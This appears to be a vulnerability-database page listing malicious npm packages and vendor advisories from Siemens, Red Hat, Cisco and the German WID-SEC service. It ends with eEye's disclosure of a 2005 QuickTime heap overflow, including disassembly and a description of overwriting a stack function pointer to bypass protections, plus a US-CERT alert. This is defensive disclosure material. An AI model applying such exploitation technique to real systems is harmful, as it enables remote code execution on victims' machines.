mal-2024-8861 Malicious code in cryptograph-js (npm) 2024-09-10T23:32:26Z 2024-09-10T23:32:27Z
mal-2024-8860 Malicious code in color-print12345 (npm) 2024-09-10T23:32:26Z 2024-09-10T23:32:27Z
mal-2024-8859 Malicious code in beautiful-text (npm) 2024-09-10T23:32:26Z 2024-09-10T23:32:27Z
mal-2024-8858 Malicious code in priv-pack (npm) 2024-09-10T02:29:11Z 2024-09-10T02:29:11Z
mal-2024-8850 Malicious code in azure-iothub-service-client (npm) 2024-09-09T11:07:52Z 2024-09-10T00:49:29Z
mal-2024-8848 Malicious code in balvant-chavda (npm) 2024-09-09T04:23:38Z 2024-09-10T00:49:29Z
mal-2024-8853 Malicious code in roblox-event-tracker (npm) 2024-09-09T19:07:27Z 2024-09-10T00:30:53Z
mal-2024-8852 Malicious code in roblox-badges (npm) 2024-09-09T19:10:16Z 2024-09-10T00:30:53Z
mal-2024-8851 Malicious code in core-roblox-utilities (npm) 2024-09-09T19:07:17Z 2024-09-10T00:30:53Z
mal-2024-8847 Malicious code in ethersscan-api (npm) 2024-09-07T14:05:30Z 2024-09-10T00:30:53Z
mal-2024-8846 Malicious code in eslint-scope-util (npm) 2024-09-07T14:05:30Z 2024-09-10T00:30:53Z
mal-2024-8845 Malicious code in eslint-module-conf (npm) 2024-09-07T14:05:30Z 2024-09-10T00:30:53Z
mal-2024-8821 Malicious code in apigeeclientlib (npm) 2024-09-05T23:46:23Z 2024-09-10T00:30:53Z
mal-2024-8819 Malicious code in 0g-storage-contracts (npm) 2024-09-05T17:25:55Z 2024-09-10T00:30:53Z
mal-2024-3831 Malicious code in vrt_hitlijst_generic_voting (npm) 2024-06-25T13:19:24Z 2024-09-10T00:30:53Z
mal-2024-8856 Malicious code in roblox-tracer (npm) 2024-09-10T00:01:10Z 2024-09-10T00:01:11Z
mal-2024-8857 Malicious code in ultimiort (npm) 2024-09-09T22:31:53Z 2024-09-09T22:31:53Z
mal-2024-8855 Malicious code in gapuler (npm) 2024-09-09T22:31:53Z 2024-09-09T22:31:53Z
mal-2024-8854 Malicious code in evolution-ds (npm) 2024-09-09T22:22:42Z 2024-09-09T22:22:43Z
mal-2024-8849 Malicious code in video.min (npm) 2024-09-09T05:56:27Z 2024-09-09T14:06:36Z
mal-2024-8840 Malicious code in @rev-mfe-temporary/notifications (npm) 2024-09-08T17:28:16Z 2024-09-08T17:28:16Z
mal-2024-8839 Malicious code in @pd-mfe/framework-request-context (npm) 2024-09-08T17:25:46Z 2024-09-08T17:25:46Z
mal-2024-8841 Malicious code in @sky-team/create-project-modal (npm) 2024-09-08T17:17:11Z 2024-09-08T17:17:11Z
mal-2024-8838 Malicious code in @zarafront/lib-zds (npm) 2024-09-08T17:03:36Z 2024-09-08T17:03:36Z
mal-2024-8837 Malicious code in @warnermediacode/wme-theme-gelatam (npm) 2024-09-08T16:45:46Z 2024-09-08T16:45:46Z
mal-2024-8836 Malicious code in @warnermediacode/wme-gep-modules-bundle (npm) 2024-09-08T16:44:25Z 2024-09-08T16:44:25Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
wid-sec-w-2023-0437 GNU Emacs: Multiple vulnerabilities allow code execution 2023-02-20T23:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2022-2181 GNU Emacs: Vulnerability allows code execution 2022-11-27T23:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2184 Wireshark: Multiple vulnerabilities 2020-12-09T23:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2183 Red Hat Enterprise Linux: Vulnerability allows display of false information 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2182 Grafana: Vulnerability allows information disclosure 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2181 Oracle Fusion Middleware: Multiple vulnerabilities 2020-07-14T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2180 Oracle Fusion Middleware: Multiple vulnerabilities 2022-04-19T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2178 Drupal: Vulnerability allows bypass of security measures 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2176 xwiki: Multiple vulnerabilities 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2051 ClamAV: Multiple vulnerabilities allow denial of service and file manipulation 2024-09-04T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2035 Red Hat OpenShift: Multiple vulnerabilities allow file manipulation and denial of service 2024-09-03T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2033 Red Hat Enterprise Linux (CPython): Vulnerability allows file manipulation 2024-09-02T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1951 expat: Multiple vulnerabilities allow denial of service 2024-08-29T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1914 Python: Vulnerability allows denial of service 2024-08-22T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1913 Red Hat OpenShift Container Platform: Multiple vulnerabilities 2024-08-22T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1828 Intel Processor: Multiple vulnerabilities 2024-08-13T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1783 Mozilla Firefox, Firefox ESR and Thunderbird: Multiple vulnerabilities 2024-08-06T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1760 ffmpeg: Multiple vulnerabilities allow unspecified attack 2024-08-05T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1756 Red Hat Enterprise Linux (python-setuptools): Vulnerability allows code execution 2024-08-04T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1722 Linux Kernel: Multiple vulnerabilities allow unspecified attack 2024-07-29T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1661 Linux Kernel: Vulnerability allows unspecified attack 2024-07-17T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1646 Linux Kernel: Multiple vulnerabilities allow file manipulation 2024-07-16T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1625 Linux Kernel: Multiple vulnerabilities allow unspecified attack 2024-07-16T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1562 Red Hat Enterprise Linux: Vulnerability allows information disclosure 2024-07-09T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1504 Apache HTTP Server: Multiple vulnerabilities 2024-07-01T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1474 Red Hat OpenShift Container Platform: Multiple vulnerabilities 2024-06-27T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1469 OpenSSL: Vulnerability allows denial of service and information disclosure 2024-06-26T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1418 Linux Kernel: Multiple vulnerabilities allow unspecified attack 2024-06-19T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1322 Linux Kernel: Multiple vulnerabilities allow denial of service and unspecified attacks 2024-06-09T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1287 Golang Go: Multiple vulnerabilities 2024-06-04T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ssa-723487 SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products 2024-07-09T00:00:00Z 2024-07-22T00:00:00Z
ssa-071402 SSA-071402: Multiple Vulnerabilities in SICAM Products 2024-07-22T00:00:00Z 2024-07-22T00:00:00Z
ssa-998949 SSA-998949: Hard-coded Default Encryption Key in Mendix Encryption Module V10.0.0 and V10.0.1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-928781 SSA-928781: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 HF1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-868282 SSA-868282: Multiple Vulnerabilities in SINEMA Remote Connect Client before V3.2 HF1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-825651 SSA-825651: Deserialization Vulnerability in SIMATIC STEP 7 (TIA Portal) before V18 Update 2 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-824889 SSA-824889: XML File Parsing Vulnerabilities in JT Open and PLM XML SDK 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-780073 SSA-780073: Denial of Service Vulnerability in PROFINET Devices via DCE-RPC Packets 2020-02-11T00:00:00Z 2024-07-09T00:00:00Z
ssa-779936 SSA-779936: Catalog-Profile Deserialization Vulnerability in Siemens Engineering Platforms before V19 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-750274 SSA-750274: Impact of CVE-2024-3400 on RUGGEDCOM APE1808 devices configured with Palo Alto Networks Virtual NGFW 2024-04-19T00:00:00Z 2024-07-09T00:00:00Z
ssa-730482 SSA-730482: Denial of Service Vulnerability in SIMATIC WinCC 2024-04-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-712929 SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products 2022-06-14T00:00:00Z 2024-07-09T00:00:00Z
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 2023-09-12T00:00:00Z 2024-07-09T00:00:00Z
ssa-593272 SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices 2020-04-14T00:00:00Z 2024-07-09T00:00:00Z
ssa-484086 SSA-484086: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.1 2022-06-14T00:00:00Z 2024-07-09T00:00:00Z
ssa-473245 SSA-473245: Denial of Service Vulnerability in Profinet Devices 2019-10-08T00:00:00Z 2024-07-09T00:00:00Z
ssa-446448 SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack 2022-04-12T00:00:00Z 2024-07-09T00:00:00Z
ssa-381581 SSA-381581: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 SP1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-346262 SSA-346262: Denial of Service Vulnerability in SNMP Interface of Industrial Products 2017-11-23T00:00:00Z 2024-07-09T00:00:00Z
ssa-337522 SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8 2024-06-11T00:00:00Z 2024-07-09T00:00:00Z
ssa-313039 SSA-313039: Deserialization Vulnerability in STEP 7 Safety before V19 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-170375 SSA-170375: Multiple Vulnerabilities in RUGGEDCOM ROS before V5.9 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-160243 SSA-160243: Multiple Vulnerabilities in SINEC NMS before V2.0 2023-10-10T00:00:00Z 2024-07-09T00:00:00Z
ssa-064222 SSA-064222: Multiple File Parsing Vulnerabilities in Simcenter Femap before V2406 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-900277 SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
ssa-879734 SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
ssa-871704 SSA-871704: Multiple Vulnerabilities in SICAM Products 2024-05-14T00:00:00Z 2024-06-11T00:00:00Z
ssa-625862 SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
ssa-620338 SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
rhsa-2023_6251 Red Hat Security Advisory: OpenShift Virtualization 4.11.7 Images security and bug fix update 2023-11-01T16:14:42+00:00 2025-03-29T04:25:59+00:00
rhsa-2023_7215 Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.2.12 2023-11-15T00:16:31+00:00 2025-03-29T04:25:57+00:00
rhsa-2023_6298 Red Hat Security Advisory: Release of OpenShift Serverless Client kn 1.30.2 security update 2023-11-03T08:48:21+00:00 2025-03-29T04:25:56+00:00
rhsa-2023_6200 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.1.9 security updates and bug fixes 2023-10-30T18:15:21+00:00 2025-03-29T04:25:56+00:00
rhsa-2023_6817 Red Hat Security Advisory: OpenShift Virtualization 4.14.0 Images security and bug fix update 2023-11-08T14:03:27+00:00 2025-03-29T04:25:53+00:00
rhsa-2023_6781 Red Hat Security Advisory: openshift-pipelines-client security update 2023-11-08T01:10:46+00:00 2025-03-29T04:25:53+00:00
rhsa-2023_6240 Red Hat Security Advisory: OpenShift Container Platform 4.13 low-latency extras security update 2023-11-01T13:41:55+00:00 2025-03-29T04:25:50+00:00
rhsa-2023_6179 Red Hat Security Advisory: Red Hat Product OCP Tools 4.13 OpenShift Jenkins security update 2023-10-30T13:03:06+00:00 2025-03-29T04:25:47+00:00
rhsa-2023_6828 Red Hat Security Advisory: ACS 4.1 enhancement update 2023-11-08T18:34:59+00:00 2025-03-29T04:25:44+00:00
rhsa-2023_6305 Red Hat Security Advisory: Migration Toolkit for Applications security update 2023-11-06T11:24:51+00:00 2025-03-29T04:25:44+00:00
rhsa-2023_6296 Red Hat Security Advisory: Release of OpenShift Serverless 1.30.2 2023-11-02T19:16:02+00:00 2025-03-29T04:25:44+00:00
rhsa-2023_6243 Red Hat Security Advisory: openshift-gitops-kam security update 2023-11-01T14:08:03+00:00 2025-03-29T04:25:41+00:00
rhsa-2023_6172 Red Hat Security Advisory: Red Hat Product OCP Tools 4.12 Openshift Jenkins security update 2023-10-30T11:24:00+00:00 2025-03-29T04:25:38+00:00
rhsa-2023_6280 Red Hat Security Advisory: Migration Toolkit for Applications security and bug fix update 2023-11-02T10:25:06+00:00 2025-03-29T04:25:35+00:00
rhsa-2023_6235 Red Hat Security Advisory: OpenShift Virtualization 4.13.5 Images security update 2023-11-01T12:04:35+00:00 2025-03-29T04:25:29+00:00
rhsa-2023_6171 Red Hat Security Advisory: Red Hat Product OCP Tools 4.11 Openshift Jenkins security update 2023-10-30T11:10:10+00:00 2025-03-29T04:25:29+00:00
rhsa-2023_6165 Red Hat Security Advisory: skupper-cli and skupper-router security update 2023-10-30T08:22:15+00:00 2025-03-29T04:25:21+00:00
rhsa-2023_6233 Red Hat Security Advisory: Red Hat OpenShift Enterprise security update 2023-11-01T11:34:35+00:00 2025-03-29T04:25:20+00:00
rhsa-2023_6126 Red Hat Security Advisory: OpenShift Container Platform 4.12.41 bug fix and security update 2023-11-01T11:07:20+00:00 2025-03-29T04:25:18+00:00
rhsa-2023_6161 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.14 security and bug fix update 2023-10-30T02:16:18+00:00 2025-03-29T04:25:11+00:00
rhsa-2023_6115 Red Hat Security Advisory: OpenShift API for Data Protection security update 2023-10-25T14:01:58+00:00 2025-03-29T04:25:11+00:00
rhsa-2023_6220 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.10.1 security update 2023-10-31T18:22:09+00:00 2025-03-29T04:25:10+00:00
rhsa-2023_6125 Red Hat Security Advisory: OpenShift Container Platform 4.12.41 security and extras update 2023-11-01T10:27:35+00:00 2025-03-29T04:25:09+00:00
rhsa-2023_6217 Red Hat Security Advisory: Red Hat OpenShift Enterprise security update 2023-10-31T14:40:40+00:00 2025-03-29T04:25:02+00:00
rhsa-2023_6156 Red Hat Security Advisory: Red Hat OpenShift support for Windows Containers 8.1.0 security update 2023-10-30T00:25:10+00:00 2025-03-29T04:25:02+00:00
rhsa-2023_6085 Red Hat Security Advisory: Red Hat OpenShift distributed tracing security update 2023-10-24T15:32:35+00:00 2025-03-29T04:25:00+00:00
rhsa-2023_6130 Red Hat Security Advisory: OpenShift Container Platform 4.13.19 bug fix and security update 2023-10-30T13:49:24+00:00 2025-03-29T04:24:59+00:00
rhsa-2023_6031 Red Hat Security Advisory: Cryostat security update 2023-10-23T14:24:36+00:00 2025-03-29T04:24:57+00:00
rhsa-2023_6202 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.8 security and bug fix updates 2023-10-30T20:13:48+00:00 2025-03-29T04:24:53+00:00
rhsa-2023_6148 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.7.9 security and bug fix updates 2023-10-26T19:18:44+00:00 2025-03-29T04:24:52+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
cisco-sa-nso-ordir-mnm8yqzo Cisco Crosswork Network Services Orchestrator Open Redirect Vulnerability 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-nso-hcc-priv-esc-owbwcs5d Cisco Crosswork Network Services Orchestrator Privilege Escalation Vulnerability 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-cnfd-rwpesc-zaoufyx8 ConfD CLI Privilege Escalation and Arbitrary File Read and Write Vulnerabilities 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-appd-netvisdos-9znbsjtk Cisco AppDynamics Network Visibility Service Denial of Service Vulnerability 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-ipphone-multi-vulns-cxahcvs Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities 2024-05-01T16:00:00+00:00 2024-05-01T16:00:00+00:00
cisco-sa-asaftd-websrvs-dos-x8gnucd2 Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability 2024-04-24T16:00:00+00:00 2024-04-24T16:00:00+00:00
cisco-sa-asaftd-persist-rce-flsnxf4h Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability 2024-04-24T16:00:00+00:00 2024-04-24T16:00:00+00:00
cisco-sa-asaftd-cmd-inj-zjv8wysm Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability 2024-04-24T16:00:00+00:00 2024-04-24T16:00:00+00:00
cisco-sa-snmp-uwbxfqww Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability 2024-04-17T16:00:00+00:00 2024-04-17T16:00:00+00:00
cisco-sa-ios-dos-hq4d3tzg Cisco IOS Software for Catalyst 6000 Series Switches Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-04-04T15:31:55+00:00
cisco-sa-tms-xss-kgw4dx9y Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-sbiz-rv-xss-oqertup Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndru-pesc-kz2pqlzh Cisco Nexus Dashboard Privilege Escalation Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndo-upav-yrqsccsp Cisco Nexus Dashboard Orchestrator Unauthorized Policy Actions Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndidv-lmxdvaf2 Cisco Nexus Dashboard Information Disclosure Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndfccsrf-temzefj9 Cisco Nexus Dashboard and Nexus Dashboard Hosted Services Cross-Site Request Forgery Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndfc-dir-trav-ssn3aydw Cisco Nexus Dashboard Fabric Controller Plug and Play Arbitrary File Read Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ise-ssrf-ftsth5oz Cisco Identity Services Engine Server-Side Request Forgery Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ise-csrf-nfakxrp5 Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ece-xss-csqxgxfm Cisco Enterprise Chat and Email Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-cucm-imps-xss-quwkd9yf Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-cem-csrf-sucmnjfr Cisco Emergency Responder Cross-Site Request Forgery and Directory Traversal Vulnerabilities 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-iosxe-utd-cmd-jbl8kvht Cisco IOS XE Software Unified Threat Defense Command Injection Vulnerability 2024-03-27T16:00:00+00:00 2024-04-02T20:11:04+00:00
cisco-sa-wlc-mdns-dos-4hv6pbgf Cisco IOS XE Software for Wireless LAN Controllers Multicast DNS Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-lisp-3gyxs3qp Cisco IOS and IOS XE Software Locator ID Separation Protocol Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-isis-sgjyouhx Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-iosxe-wlc-privesc-rjsmrmpk Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-iosxe-priv-esc-seax6nlx Cisco IOS XE Software Privilege Escalation Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-iosxe-ospf-dos-dr9sfrxp Cisco IOS XE Software OSPFv2 Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-ios-xe-sda-edge-dos-qzwuwxwg Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-200512-0300 Heap-based buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a GIF image file with a crafted Netscape Navigator Application Extension Block that modifies the heap in the Picture Modifier block. Apple's QuickTime is a player for files and streaming media in a variety of different formats. A flaw in QuickTime's handling of Targa (TGA) image format files could allow a remote attacker to execute arbitrary code on a vulnerable system. Apple has released QuickTime 7.0.4, a version that fixes multiple vulnerabilities. A remote third party may execute arbitrary code or cause a denial of service (DoS). For more information, see the information provided by the vendor. QuickTime is prone to a remote heap-based overflow vulnerability. This issue presents itself when the application processes a specially crafted GIF image file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls. The heap can be overwritten in the Picture Modifier block.
The block size calculation code is as follows:
.text:66A339CC mov ax, [esi+0Ch]
.text:66A339D0 xor ecx, ecx
.text:66A339D2 mov [esp+34h+var_28], ecx
.text:66A339D6 mov [esp+34h+var_24], ecx
.text:66A339DA mov [esp+34h+var_20], ecx
.text:66A339DE mov [esp+34h+var_1C], ecx
.text:66A339E2 mov word ptr [esp+34h+var_10], cx
.text:66A339E7 mov [esp+34h+arg_4], eax
.text:66A339EB movsx eax, ax
.text:66A339EE mov word ptr [esp+34h+var_10+2], cx
.text:66A339F3 mov cx, [esi+8]
.text:66A339F7 movsx edx, cx
.text:66A339FA sub eax, edx
.text:66A339FC movsx edx, word ptr [esi+6]
.text:66A33A00 add eax, 3Eh
.text:66A33A03 push edi
.text:66A33A04 movsx edi, word ptr [esi+0Ah]
.text:66A33A08 sar eax, 3
.text:66A33A0B lea ebx, [esi+6]
.text:66A33A0E and eax, 0FFFFFFFCh
.text:66A33A11 sub edi, edx
.text:66A33A13 movsx edx, ax
.text:66A33A16 mov [esi+4], ax
.text:66A33A1A imul edi, edx
The allocation code is:
.text:66A33A68 push edi
.text:66A33A69 call sub_668B5B30
But when it actually processes data into this memory, it uses the real decoded data to write to this memory but didn't check this heap size. This is a segment of the write code function (sub_66AE0A70):
.text:66AE0B18 movsx edx, word ptr [edi+12h] ; default
.text:66AE0B1C imul edx, [edi+0Ch]
.text:66AE0B20 mov ecx, [edi+4]
.text:66AE0B23 inc word ptr [edi+16h]
.text:66AE0B27 mov eax, [esp+arg_0]
.text:66AE0B2B add edx, ecx
.text:66AE0B2D mov [eax], edx
.text:66AE0B2F mov eax, [ebp+10h]
.text:66AE0B32 test eax, eax
.text:66AE0B34 jz short loc_66AE0B62
.text:66AE0B36 mov ax, [ebp+1Ch]
.text:66AE0B3A mov edx, [ebp+0Ch]
.text:66AE0B3D movzx cx, ah
.text:66AE0B41 mov ch, al
.text:66AE0B43 mov [edx], cx
.text:66AE0B46 movsx eax, word ptr [edi+12h]
.text:66AE0B4A imul eax, [ebp+14h]
.text:66AE0B4E add eax, [ebp+10h]
.text:66AE0B51 mov cx, [ebp+18h]
.text:66AE0B55 mov [ebp+0Ch], eax
.text:66AE0B58 mov [ebp+1Ah], cx
.text:66AE0B5C mov word ptr [ebp+1Ch], 0
Vendor Status: Apple has released a patch for this vulnerability.
An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directly overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1.
Technical Details: When Quicktime processes the data field of a qtif format file, it will copy it to the stack by a byte to a byte, but there is no proper checking, so it will cause a stack overflow in memory. And in this stack, there is a function pointer which will be used immediately when it pre byte copies, so we can use it to bypass any stack overflow protection, such in xp sp2 and 2003 sp1. The origin function point value is 0x44332211. We only need to overflow it to: 0x08332211, ensuring it didn't cause a crash before the 0x44 has been overflowed to 0x08. When it overflows to 0x08332211, we can execute code to 0x08332211, and can first use javascript to get this memory and set my code in it.
call [esp+138h+arg_4] <- call a function point in the stack, but this point can be overflowed
References QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html
Protection: Retina Network Security Scanner has been updated to identify this vulnerability.
Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CVE-2005-2340.
Credit: Discovery: Fang Xing
Greetings: Thanks to all the guys at eEye, and especially Karl Lynn's help.
Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information.
National Cyber Alert System
Technical Cyber Security Alert TA06-011A
Apple QuickTime Vulnerabilities
Original release date: January 11, 2006
Last revised: January 11, 2006
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows XP
* Microsoft Windows 2000
Overview
Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service.
I. Description
Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713)
II. Impact
The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service.
III. Solution
Upgrade
Upgrade to QuickTime 7.0.4.
Appendix A. References
* US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845>
* US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193>
* US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729>
* US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753>
* US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449>
* CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340>
* CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092>
* CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707>
* CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710>
* CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713>
* Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101>
* QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html>
* About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810>
The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html>
